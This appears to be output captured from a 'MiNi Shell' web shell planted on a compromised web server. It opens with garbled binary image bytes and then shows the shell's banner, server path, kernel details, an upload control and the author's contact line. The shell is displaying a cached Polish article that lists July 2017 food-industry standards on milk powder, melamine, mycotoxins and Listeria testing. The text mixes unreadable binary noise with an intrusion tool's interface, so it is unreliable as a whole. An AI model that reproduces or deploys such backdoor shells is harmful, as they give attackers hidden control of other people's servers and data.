JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/a0/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/frontend/runtime/cache/a0/a0ab7ad9985b1dc8e4912fed52ce7b87.bin

a:2:{i:0;a:2:{i:0;s:15200:" 
                    
                    <h3 class="title">Polskie Normy dotyczące branży spożywczej - lipiec 2017</h3>
                    <p>
                        <span class="glyphicon glyphicon-time" aria-hidden="true"></span> <strong> 02-08-2017, 00:00</strong>
                                            </p>

                    <div class="lorem">
                        <h3 style="text-align:center;">
	<span style="color:rgb(0,51,51);">Zestawienie Polskich Norm dotyczących branży spożywczej</span></h3>
<h3 style="text-align:center;">
	<span style="color:rgb(0,51,51);">- lipiec 2017</span></h3>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PKN-ISO/TS 17758:2017-07 - wersja polska</strong></span></h4>
<p>
	<strong>Data publikacji:</strong> 14-07-2017</p>
<p>
	Mleko w proszku instant -- Oznaczanie rozpraszalności i zwilżalności</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszej Specyfikacji Technicznej określono metodę oznaczania rozpraszalności w wodzie mleka w proszku instant.<br />
	Metoda ma zastosowanie do mleka w proszku odtłuszczonego instant wytworzonego zarówno w procesie bezpośrednim, jak i w procesie z ponownym nawilżaniem, a także do mleka w proszku pełnego instant.</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PKN-ISO/TS 27265:2017-07 - wersja polska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>14-07-2017</p>
<p>
	Mleko w proszku -- Oznaczanie liczby szczególnie ciepłoopornych przetrwalników bakterii termofilnych</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszej Specyfikacji Technicznej określono metodę oznaczania liczby jednostek tworzących kolonie (CFU) szczególnie ciepłoopornych przetrwalników bakterii termofilnych w produktach mlecznych w proszku metodą liczenia kolonii po ogrzaniu próbki w temperaturze 106 °C i inkubacji w temperaturze 55 °C.<br />
	Możliwość zastosowania niniejszej Specyfikacji Technicznej jest ograniczona do mleka w proszku pełnego, mleka odtłuszczonego i maślanki, produktów w proszku, które są przeznaczone do odtworzenia i zastosowania do produkcji produktów mlecznych sterylizowanych (np. UHT lub poddanych obróbce termicznej w zbiornikach zamkniętych).</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-EN 16858:2017-07 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>14-07-2017</p>
<p>
	Artykuły żywnościowe -- Oznaczanie melaminy i kwasu cyjanurowego w artykułach żywnościowych metodą chromatografii cieczowej sprzężonej z tandemową spektrometrią mas (LC-MS/MS)</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszej Normie Europejskiej określono metodę oznaczania melaminy i kwasu cyjanurowego w artykułach żywnościowych metodą chromatografii cieczowej sprzężonej z tandemową spektrometrią mas. Metoda została zwalidowana w badaniach międzylaboratoryjnych próbek wzbogaconych preparatów mlecznych dla niemowląt, preparatów sojowych dla niemowląt, mleka w proszku, mleka pełnego, napoju sojowego i mleka czekoladowego w zakresie od 0,71 mg/kg do 1,43 mg/kg dla melaminy i od 0,57 mg/kg do 1,45 mg/kg dla kwasu cyjanurowego. Granica oznaczalności (LOQ) dla melaminy i kwasu cyjanurowego w żywności wynosi odpowiednio 0,05 mg/kg i 0,25 mg/kg. Górna granica zakresu pracy wynosi do 10 mg/kg dla melaminy i do 25 mg/kg dla kwasu cyjanurowego.</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-EN 16923:2017-07 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>14-07-2017</p>
<p>
	Artykuły żywnościowe -- Oznaczanie toksyny T-2 i toksyny HT-2 w zbożach i produktach zbożowych dla niemowląt i małych dzieci metodą LC-MS/MS po oczyszczaniu SPE</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszej Normie Europejskiej opisano metodę oznaczania zawartości toksyny T-2 i toksyny HT-2 w zbożach i produktach na bazie zbóż np. owies, przeznaczonych do żywienia niemowląt i małych dzieci, z zastosowaniem wysokosprawnej chromatografii cieczowej (HPLC) sprzężonej z tandemową spektrometrią mas (MS/MS) po oczyczaniu metodą ekstrakcji do fazy stałej (SPE) [5].<br />
	Metoda została zwalidowana dla toksyny HT-2 w mące owsianej na poziomie 9,3 µg/kg i 28,1 µg/kg, płatkach owsianych na poziomie 16,5 µg/kg i 21,4 µg/kg, oraz zbożowych płatkach śniadaniowych (zawierających płatki owsiane) na poziomie 8,1 µg/kg i dla toksyny T-2 w mące owsianej na poziomie 4,4 µg/kg i 8,3 µg/kg, płatkach owsianych na poziomie 4,9 µg/kg i 6,6 µg/kg oraz płatkach śniadaniowych (zawierających płatki owsiane) na poziomie of 3,5 µg/kg.<br />
	Doświadczenia laboratoryjne [6] wykazały że metoda ma także zastosowanie dla materiałów bardzo pęczniejących (suche kasze owsiane i skrobie modyfikowane), ale nie zostało to sprawdzone w badaniach metodami walidacyjnymi. Szczegóły przedstawiono w 6.3. Metoda może być także stosowana dla produktów owsianych na wyższych poziomach zawartości toksyny T-2- i HT-2. W takim przypadku należy uwzględnić etap rozcieńczania [6].<br />
	Metoda może być także stosowana dla zbóż i przetworów zbożowych dla niemowląt i małych dzieci np. na bazie pszenicy, jęczmienia i ryżu. W takim przypadku jest wymagana własna walidacja metody dla każdego materiału.<br />
	Podczas badań międzylaboratoryjnych rozpatrywany był zakres od 10 μg/kg do 100 μg/kg i z wstępnych badań wynika, że metoda działa dobrze w całym zakresie, chociaż ostateczna walidacja została wykonana tylko w zakresie od 3,5 μg/kg do 28,1 μg/kg.</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-EN 16924:2017-07 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>14-07-2017</p>
<p>
	Artykuły żywnościowe -- Oznaczanie zearalenonu w jadalnych olejach roślinnych metodą LC-FLD lub LC-MS/MS</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszej Normie Europejskiej opisano procedurę oznaczania zawartości zearalenonu w specyficznym jadalnym oleju roślinnym z zarodków kukurydzy jedną z następujących technik: Wysokosprawna chromatografia cieczowa z detekcją fluorescencyjną (LC-FLD) lub wysokosprawna chromatografia cieczowa sprzężona z tandemową spektrometrią mas (LC-MS/MS) po podstawowej ekstrakcji rozcieńczonego oleju.<br />
	Metoda została zwalidowana dla zearalenonu w naturalnie zanieczyszczonym oleju z zarodków kukurydzy na poziomie od 61,2 µg/kg do 515 µg/kg [5].<br />
	Doświadczenia laboratoryjne [6] wykazały że niniejsza metoda może mieć także zastosowanie dla innych olejów roślinnych takich jak olej z zarodków pszenicy (n = 4), olej słonecznikowy (n = 5), olej z pestek dyni (n = 1), olej sojowy (n = 5), olej z nasion konopi (n = 5), olej rzepakowy (n = 11), oraz olej mieszany zawierający olej z zarodków kukurydzy (n = 3). Jednakże sporadycznie, próbki mogą wykazywać zakłócenia w chromatogramach FLD. W takim przypadku zalecane jest wykrywanie za pomocą MS/MS.</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-EN 16995:2017-07 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>18-07-2017</p>
<p>
	Artykuły żywnościowe -- Oleje roślinne i artykuły żywnościowe wyprodukowane na bazie olejów roślinnych -- Oznaczanie węglowodorów nasyconych olejów mineralnych (MOSH) i węglowodorów aromatycznych olejów mineralnych (MOAH) z zastosowaniem HPLC-GC-FID w trybie ciągłym</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszej Normie Europejskiej określono wysoce sprawną metodę oznaczania węglowodorów nasyconych i aromatycznych (od C10 do C50) w tłuszczach roślinnych i olejach oraz artykułach żywnościowych wyprodukowanych na bazie olejów roślinnych dla których była ona walidowana w badaniach międzylaboratoryjnych, z zastosowaniem HPLC-GC-FID w trybie ciągłym [1], [2] i [3]. Nie jest przewidziane stosowanie niniejszej normy dla innych matryc.<br />
	Metoda może być stosowana do oznaczania węglowodorów nasyconych olejów mineralnych (MOSH) i/lub węglowodorów aromatycznych olejów mineralnych (MOAH) .<br />
	Metoda została sprawdzona w badaniach międzylaboratoryjnych przez analizę zarówno naturalnie zanieczyszczonych jak i wzbogaconych próbek oleju roślinnego oraz próbek majonezu i margaryny w zakresie od 4 mg/kg do 197 mg/kg dla MOSH, oraz od 2 mg/kg do 51 mg/kg dla MOAH.<br />
	Na podstawie wyników badań międzylaboratoryjnych wykazano przydatność metody dla stężeń masowych MOSH i MOAH, dla każdego z nich powyżej 10 mg/kg.<br />
	W przypadku podejrzenia zakłóceń ze źródeł naturalnych, mineralne pochodzenie frakcji MOSH i MOAH może być sprawdzone poprzez zbadanie wzoru metodą GC-MS.</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-EN ISO 11290-1:2017-07 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>18-07-2017</p>
<p>
	Mikrobiologia łańcucha żywnościowego -- Horyzontalna metoda wykrywania i oznaczania liczby Listeria monocytogenes i innych Listeria spp. -- Część 1: Metoda wykrywania</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszym dokumencie podano opis horyzontalnej metody do<br />
	- wykrywania L. monocytogenes;<br />
	- wykrywania Listeria spp. (łącznie z L. monocytogenes)<br />
	Niniejszy dokument ma zastosowanie do:<br />
	- środków spożywczych i składników przeznaczonych do żywienia ludzi i zwierząt, oraz<br />
	- próbek środowiskowych pobranych w obszarach produkcji i obrotu żywnością<br />
	Istnieje możliwość, że niektóre dodatkowo opisane Listeria, mogą nie być wykrywane lub potwierdzone przy zastosowaniu niniejszej metody. [5],[10],[12],[14],[25],[26],[27]</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-EN ISO 11290-2:2017-07 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>25-07-2017</p>
<p>
	Mikrobiologia łańcucha żywnościowego -- Horyzontalna metoda wykrywania i oznaczania liczby Listeria monocytogenes i innych Listeria spp. -- Część 2: Metoda oznaczania liczby</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszym dokumencie podano opis horyzontalnej metody do<br />
	- oznaczania liczby L. monocytogenes, oraz<br />
	- oznaczania liczby Listeria spp. (łącznie z L. monocytogenes)<br />
	Niniejszy dokument ma zastosowanie do:<br />
	- środków spożywczych i składników przeznaczonych do żywienia ludzi i zwierząt, oraz<br />
	- próbek środowiskowych pobranych w obszarach produkcji i obrotu żywnością<br />
	Istnieje możliwość, że niektóre dodatkowo opisane Listeria, mogą nie być wykrywane lub potwierdzone przy zastosowaniu niniejszej metody. [3],[6],[9],[11]</p>
<hr />
<p style="text-align:right;">
	Zestawienie zostało opracowane przez Redakcję Jedzenie.info.pl<br />
	na podstawie ogólnodostępnych informacji publikowanych przez PKN.</p>                        
                         
 
                        <div class="googleads-article">
<!-- script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script -->
<!-- vManager - w treści artykułu 2 -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6177099932506559"
     data-ad-slot="9192484574"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
                        </div>


                           
                    </div>
                    
                    <div class="text-center">
                                        </div>

                                            
                      
                        
                        
                    
                                        <div class="portal-light-background p1em mt1">
                        <strong>Źródło:</strong> 
                        <span>
                                                            <a href="http://www.pkn.pl" target="_blank">
                                                    
                            Polski Komitet Normalizacyjny                                                        
                                                            </a>
                                                    </span>
                        <br>
                    </div>
                                        
                                            <div class="nav-table tags mt05">
                            <div>Tagi:</div>    
                            <div>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Polski+Komitet+Normalizacyjny" class="label label-default">Polski Komitet Normalizacyjny</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Polskie+Normy" class="label label-default">Polskie Normy</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=zestawienie" class="label label-default">zestawienie</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=lipiec+2017" class="label label-default">lipiec 2017</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=branża+spożywcza" class="label label-default">branża spożywcza</a>
                                                            </div>
                        </div>
                                            
                        
                    <div id="fb-root"></div>
                    <!--script async defer crossorigin="anonymous" src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0" nonce="2g9iczzS"></script-->
                    
<script>
//<![CDATA[
var lx=!1;window.addEventListener("scroll",function(){(0!=document.documentElement.scrollTop&&!1===lx||0!=document.body.scrollTop&&!1===lx)&&(!function(){var e=document.createElement("script");e.type="text/javascript",e.async=!0,e.src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(),lx=!0)},!0);
//]]>
</script>
                    
                    <div class="social text-center mb1">
                        <div class="fb-like" data-href="https://www.jedzenie.info.pl/artykuly/szczegoly/60959_polskie-normy-dotyczace-branzy-spozywczej-lipiec-2017" data-width="" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div>
                    </div>

                    
                    <div id="articles">    
                        
                    
                                    ";i:1;N;}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:2:{i:0;s:13:"article_60959";i:1;s:8:"articles";}s:4:"data";a:2:{s:32:"ce091006e0b6051fc3017cf18db02b73";s:21:"0.36797600 1746590553";s:32:"9f4ebfa1b76d6bc6617aec9034853422";s:21:"0.22954000 1749980350";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com